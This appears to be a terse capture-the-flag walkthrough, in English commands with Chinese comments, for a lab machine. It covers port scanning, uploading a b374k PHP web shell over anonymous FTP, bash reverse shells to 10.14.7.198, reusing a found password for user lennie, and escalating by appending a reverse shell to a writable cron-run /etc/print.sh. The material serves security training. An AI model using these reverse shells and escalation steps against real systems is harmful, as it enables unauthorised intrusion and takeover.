nmap -A 10.10.37.216
python3 dirsearch.py -u http://10.10.37.216/ -e all
http://10.10.37.216/files/
ftp 10.10.37.216
Anonymous
b374k.php
files
)
http://10.10.37.216/files/ftp/b374k.php
nc -vlk 7877
bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
love
incidents
suspicious.pcapng
/home
lennie
使用者c4ntg3t3n0ughsp1c3
su lennie
並搭配上述密碼
planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
startup_list.txt
/etc/print.sh
/etc/print.sh
可以發現我們有 write 的權限
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
print.sh
下面加上一行 reverse shell
echo "bash -c 'bash -i >& /dev/tcp/10.14.7.198/8778 0>&1'" >> /etc/print.sh
nc -vlk 8778
來聽planner.sh
crontab -l